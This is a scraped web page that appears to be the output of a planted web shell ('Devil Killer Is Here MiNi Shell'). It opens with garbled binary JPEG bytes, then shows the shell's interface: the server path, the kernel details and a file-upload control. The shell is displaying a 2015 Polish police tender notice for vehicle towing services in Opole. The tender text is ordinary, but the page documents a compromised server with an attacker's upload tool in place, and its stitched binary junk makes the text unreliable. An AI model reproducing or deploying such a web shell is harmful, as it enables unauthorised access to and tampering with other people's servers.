JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150115/5723-N-2015.html

<p class="kh_header"><b>Opole: Holowanie/przewożenie pojazdów i mienia - części samochodowych do celów procesowych i innych zlecanych przezPolicję.</b><br>
<b>Numer ogłoszenia: 5723 - 2015; data zamieszczenia: 15.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji w Opolu , ul. Korfantego 2, 45-077 Opole, woj. opolskie, tel. 77 4545001, 4222670.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opolska.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Holowanie/przewożenie pojazdów i mienia - części samochodowych do celów procesowych i innych zlecanych przezPolicję..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest holowanie/przewożenie pojazdów i przewóz innych przedmiotów (mienia - części samochodowych) na warunkach określonych w szczegółowym opisie przedmiotu zamówienia i wzorze umowy stanowiących załączniki do specyfikacji istotnych warunków zamówienia. Wykonanie usługi (w ramach danego zadania) następuje w granicach administracyjnych powiatu właściwego dla siedziby powiatowej jednostki Policji z podziałem
na dwie kategorie holowanych pojazdów: a)Holowanie/przewożenie pojazdów o DMC do 3.5t. włącznie (od 0,01kg do 3,5t.) b)Holowanie/przewożenie pojazdów o DMC powyżej 3.5 t.
Holowanie/przewożenie musi się odbywać przy wykorzystaniu sprzętu będącego w
dyspozycji Wykonawcy. Zamawiający nie dopuszcza, aby Wykonawca w celu
przetransportowania zabezpieczonego sprzętu transportowego, do miejsca parkowania ujętego w dyspozycji usunięcia pojazdu, kierował nim, nawet w przypadku nie odebrania dowodu rejestracyjnego. Zabezpieczony pojazd musi być przewożony na platformie holownika lub poprzez podczepienie pod holownik. Wykonawca ma obowiązek osobistego wykonania kluczowych części zamówienia. Jako kluczowe części zamówienia zamawiający wskazuje
usługę holowania/przewożenia pojazdów o DMC do 3,5 t. włącznie...</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.11.80.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować odpowiednim potencjałem technicznym, tj.
dysponują sprawnym technicznie sprzętem transportowym w tym: co najmniej
dwoma pojazdami specjalnie przystosowanymi do holowania/przewozu
uszkodzonych pojazdów samochodowych, w tym jednym przystosowanym do
przewozu pojazdów o DMC do 3.5 t. włącznie (od 0,01kg do 3,5t.) i drugim
przystosowanym do holowania pojazdów o DMC powyżej 3,5 t. , który musi
spełniać wymagania określone w Rozporządzeniu Ministra Infrastruktury z
dnia 31 grudnia 2002r. w sprawie warunków technicznych pojazdów oraz ich
niezbędnego wyposażenia (Dz. U. nr 32 poz262 z 2003r. z późn. zmianami,
posiadającym: -aktualny wpis w dowodzie rejestracyjnym, z którego wynika,
że jest to pojazd specjalny o przeznaczeniu pomocy drogowej - zgodnie z
przepisami ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (tekst
jednolity: Dz.U. z 2012 r. poz. 1137 z późniejszymi zmianami). -ważne
badania techniczne - zgodnie z przepisami ustawy z dnia 20 czerwca 1997 r.
Prawo o ruchu drogowym (tekst jednolity: Dz.U. z 2012 r. poz. 1137 z
późniejszymi zmianami). -oznakowanie - zgodnie z wymaganiami
określonymi w Rozporządzeniu Ministra Infrastruktury z dnia 31 grudnia
2002r. w sprawie warunków technicznych pojazdów oraz ich niezbędnego
wyposażenia (Dz. U. nr 32 poz262 z 2003r. z późn. zmianami, -ubezpieczenie
OC</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować odpowiednimi osobami zdolnymi do
wykonania zamówienia, tj. co najmniej dwoma kierowcami, w tym co
najmniej jednym kierowcą posiadającym uprawnienia do holowania pojazdów
o DMC powyżej 3,5 t. - zgodnie z przepisami ustawy z dnia 20 czerwca 1997
r. Prawo o ruchu drogowym (tekst jednolity: Dz.U. z 2012 r. poz. 1137 z
późniejszymi zmianami).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi potwierdzić spełnienie warunku dot. sytuacji ekonomicznej i
finansowej, tj. posiadać aktualną umowę ubezpieczenia OC w zakresie
prowadzonej działalności gospodarczej dotyczącej przedmiotu zamówienia
obejmującą zakres deliktowy na kwotę min. 10 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 może polegać na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b. Zobowiązanie podmiotu trzeciego powinno bezsprzecznie i jednoznacznie wskazywać co najmniej: 
a. rodzaj udostępnianych zasobów, 
b. w jaki sposób zobowiązanie będzie wykonywane - formę udostępnienia zasobów, 
c. jakiego okresu zobowiązanie dotyczy, 
d. kto jest podmiotem przyjmującym zasoby. 
Zobowiązanie musi mieć formę oryginału. 
Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b ustawy, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Dodatkowy sprzęt do obsługi zdarzeń drogowych - 5</li>
</ul>
<p><b>IV.2.2)</b></p>
<p>przeprowadzona będzie aukcja elektroniczna:</b> tak, adres strony, na której będzie prowadzona: https://aukcje.uzp.gov.pl. jeżeli w danym zadaniu złożone zostaną co najmniej 3 oferty pisemne niepodlegające odrzuceniu</p><p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany umowy w trakcie jej obowiązywania w następującym zakresie: 
-zmiana podwykonawcy oraz zakresu realizacji zamówienia przez podwykonawcę, 
-w przypadku braku środków na realizację zadania lub wystąpienia innych nie przewidzianych przyczyn Zamawiający dopuszcza możliwość przesunięcia w formie aneksu do umowy ostatecznego terminu realizacji przedmiotu umowy lub rezygnacji z części usług.
Zamawiający, zgodnie z art.144 ust.1 ustawy PZP, przewiduje również możliwość dokonania zmiany postanowień zawartej umowy w zakresie: 
1.zmiany stawki podatku VAT,
2.wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie atr.2 ust. 3-5 Ustawy z dnia 10 października 2002 roku o minimalnym wynagrodzeniu za pracę, 
3.zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, 
- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zamowienia.opolska.policia.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji w Opolu, ul. Korfantego 2, 45-077 Opole, pok. nr 168 po uprzednim złożeniu wniosku o przekazanie specyfikacji istotnych warunków zamówienia za odpłatnością..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.01.2015 godzina 11:00, miejsce: Komenda Wojewódzka Policji w Opolu, ul. Korfantego 2, 45-077 Opole, pok. nr 204..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> KMP Opole..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest holowanie-przewożenie pojazdów i przewóz innych przedmiotów (mienia - części samochodowych) na warunkach określonych w szczegółowym opisie przedmiotu zamówienia i wzorze umowy stanowiących załączniki do specyfikacji istotnych warunków zamówienia. Wykonanie usługi następuje w granicach administracyjnych powiatu (Opolski) właściwego dla siedziby powiatowej jednostki Policji z podziałem na dwie kategorie holowanych pojazdów:
a)Holowanie/przewożenie pojazdów o DMC do 3.5 t. włącznie (od 0,01kg do 3,5t.)
b)Holowanie/przewożenie pojazdów o DMC powyżej 3.5 t. Przewidywana ilość
kilometrów holowania pojazdów o DMC do 3.5 t. włącznie - 5000km. Przewidywana
ilość kilometrów holowania pojazdów powyżej 3.5 ton DMC - 300km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.80.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Dodatkowy sprzęt do obsługi zdarzeń drogowych - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> KPP Krapkowice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest holowanie-przewożenie pojazdów i przewóz innych przedmiotów (mienia - części samochodowych) na warunkach określonych w szczegółowym opisie przedmiotu zamówienia i wzorze umowy stanowiących załączniki do specyfikacji istotnych warunków zamówienia. Wykonanie usługi następuje w granicach administracyjnych powiatu (Krapkowicki) właściwego dla siedziby powiatowej jednostki Policji z podziałem na dwie kategorie holowanych pojazdów:
a)Holowanie/przewożenie pojazdów o DMC do 3.5 t. włącznie (od 0,01kg do 3,5t.)
b)Holowanie/przewożenie pojazdów o DMC powyżej 3.5 t. Przewidywana ilość
kilometrów holowania pojazdów o DMC do 3.5 t. włącznie- 1200km. Przewidywana
ilość kilometrów holowania pojazdów powyżej 3.5 ton DMC - 200km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.80.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Dodatkowy sprzęt do obsługi zdarzeń drogowych - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> KPP Nysa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest holowanie-przewożenie pojazdów i przewóz innych przedmiotów (mienia - części samochodowych) na warunkach określonych w szczegółowym opisie przedmiotu zamówienia i wzorze umowy stanowiących załączniki do specyfikacji istotnych warunków zamówienia. Wykonanie usługi następuje w granicach administracyjnych powiatu (Nyski) właściwego dla siedziby powiatowej jednostki Policji z podziałem na dwie kategorie holowanych pojazdów:
a)Holowanie/przewożenie pojazdów o DMC do 3.5 t. włącznie (od 0,01kg do 3,5t.)
b)Holowanie/przewożenie pojazdów o DMC powyżej 3.5 t. Przewidywana ilość
kilometrów holowania pojazdów o DMC do 3.5 t. włącznie- 1600km. Przewidywana
ilość kilometrów holowania pojazdów powyżej 3.5 ton DMC - 300km...</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.80.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> KPP Strzelce Opolskie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest holowanie-przewożenie pojazdów i przewóz innych przedmiotów (mienia - części samochodowych) na warunkach określonych w szczegółowym opisie przedmiotu zamówienia i wzorze umowy stanowiących załączniki do specyfikacji istotnych warunków zamówienia. Wykonanie usługi następuje w granicach administracyjnych powiatu (Strzelecki) właściwego dla siedziby powiatowej jednostki Policji z podziałem na dwie kategorie holowanych pojazdów:
a)Holowanie/przewożenie pojazdów o DMC do 3.5 t. włącznie (od 0,01kg do 3,5t.)
b)Holowanie/przewożenie pojazdów o DMC powyżej 3.5 t. Przewidywana ilość
kilometrów holowania pojazdów o DMC do 3.5 t. włącznie - 1800km. Przewidywana
ilość kilometrów holowania pojazdów powyżej 3.5 ton DMC - 200km..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.80.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Dodatkowy sprzęt do obsługi zdarzeń drogowych - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com